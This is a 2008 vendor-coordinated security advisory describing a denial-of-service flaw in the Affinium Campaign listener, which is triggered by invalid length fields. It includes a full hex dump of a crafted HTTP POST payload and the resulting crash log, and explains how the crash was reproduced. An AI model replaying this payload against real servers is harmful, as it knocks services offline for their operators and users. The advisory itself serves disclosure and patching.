Portcullis Security Advisory - 08-007


Vulnerable System:

Affinium Campaign


Vulnerability Title:

The listener is vulnerable to Denial of Service.


Vulnerability Discovery And Development:

Portcullis Security Testing Services.


Credit For Discovery:

Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.


Affected systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

Whilst it was not possible to confirm the exact nature of the vulnerability, it is believed that on connecting to the listener server, that a four byte length value is accepted which is used in calculations relating to memory allocations. By specifying an invalid value for this, the server fails when allocating/accessing memory. Note: In reproducing this, connections were spawned which sent a four byte value which was incremented on each connection until the server crashed.

Similar issues can also be triggered from the web application which is typically deployed in front of the listener server. In this case the application makes use of an ActiveX control which encapsulates binary data within an HTTP POST request to http://webserver/Campaign/CampaignListener. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. It was identified that again length encoding was used and as with the direct connection, manipulation of these length fields could affect memory allocation. For example, by specifying invalid two byte length values, the server can be made to fail when allocating memory. For example:

00000000  50 4f 53 54 20 2f 43 61  6d 70 61 69 67 6e 2f 43  |POST /Campaign/C|
00000010  61 6d 70 61 69 67 6e 4c  69 73 74 65 6e 65 72 3f  |ampaignListener?|
00000020  43 6c 69 65 6e 74 49 44  3d 35 20 48 54 54 50 2f  |ClientID=5 HTTP/|
00000030  31 2e 31 0d 0a 48 6f 73  74 3a 20 77 65 62 73 65  |1.1..Host: webse|
00000040  72 76 65 72 0d 0a 43 6f  6f 6b 69 65 3a 20 43 41  |rver..Cookie: CA|
00000050  4d 50 41 49 47 4e 53 45  53 53 49 4f 4e 49 44 3d  |MPAIGNSESSIONID=|
00000060  48 56 73 62 47 35 70 6e  44 37 52 6c 79 67 6e 43  |HVsbG5pnD7RlygnC|
00000070  38 64 74 4e 56 50 76 50  43 51 56 57 32 37 78 54  |8dtNVPvPCQVW27xT|
00000080  4c 63 76 79 36 51 57 63  51 51 4c 51 32 51 52 52  |Lcvy6QWcQQLQ2QRR|
00000090  46 56 57 76 21 31 33 36  34 35 35 34 39 33 34 0d  |FVWv!1364554934.|
000000a0  0a 43 6f 6e 74 65 6e 74  2d 4c 65 6e 67 74 68 3a  |.Content-Length:|
000000b0  20 32 39 36 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  | 296..Content-Ty|
000000c0  70 65 3a 20 6d 75 6c 74  69 70 61 72 74 2f 66 6f  |pe: multipart/fo|
000000d0  72 6d 2d 64 61 74 61 0d  0a 0d 0a 1f 01 00 00 01  |rm-data.........|
000000e0  00 02 07 0c 00 00 00 01  01 00 00 00 03 00 00 00  |................|
000000f0  12 0c 00 00 00 75 6e 69  63 61 5f 61 63 73 76 72  |.....unica_acsvr|
00000100  00 12 73 00 00 00 2f 61  70 70 73 2f 75 6e 69 63  |..s.../apps/unic|
00000110  61 2f 61 66 66 69 6e 69  75 6d 2f 41 66 66 69 6e  |a/affinium/Affin|
00000120  69 75 6d 2f 43 61 6d 70  61 69 67 6e 2f 70 61 72  |ium/Campaign/par|
00000130  74 69 74 69 6f 6e 73 2f  70 61 72 74 69 74 69 6f  |titions/partitio|
00000140  6e 31 2f 63 61 6d 70 61  69 67 6e 73 2f 41 41 41  |n1/campaigns/AAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00000170  41 41 41 41 41 41 41 41  00 04 2a 00 00 00 0e f2  |AAAAAAAA..*....ò|
00000180  95 47 51 57 f2 00 00 00  00 00 14 00 00 00 01 29  |.GQWò..........)|
00000190  d5 1b 4f 5f 75 72 f9 00  66 3c 62 8a b8 d6 c3 a6  |Õ.O_urù.f<b.¸Öæ|
000001a0  4f 63 00 00 00 00 00 00  12 0b 00 00 00 70 61 72  |Oc...........par|
000001b0  74 69 74 69 6f 6e 31 00  12 00 00 00 00 12 0e 00  |tition1.........|
000001c0  00 00 31 32 30 31 30 30  37 38 37 31 32 39 38 00  |..1201007871298.|
000001d0  05 01 00 00 00 00 00 00  00 05 01 00 00 00 00 00  |................|
000001e0  00 00 05 01 00 00 00 02  00 00 00 12 03 00 00 00  |................|
000001f0  2d 6c 00 12 06 00 00 00  65 6e 5f 55 53 00 41 41  |-l......en_US.AA|
00000200  d3 4d 00 0d 0a                                    |ÓM...|

The status log included the following line detailing the Denial of Service:

01/22/2008 13:48:13.220 [E] [MEMORY]    SBRK value: 20ab2d50; _end: 200a2974; difference: 10552284 [hmem:2101]
01/22/2008 13:48:13.220 [E] [MEMORY]    OUT OF MEMORY: Unable to REALLOCATE 1305706496 bytes. [hmem:2404]

1305706496 can be expressed as 0x4dd38000 in hexidecimal. Once endian and encoding issues have been accounted for, the top two bytes correspond to our invalid two byte length value of 0xd34d (see 0x200).


Impact:

An attacker would be able to cause a Denial of Service.


Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches


Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.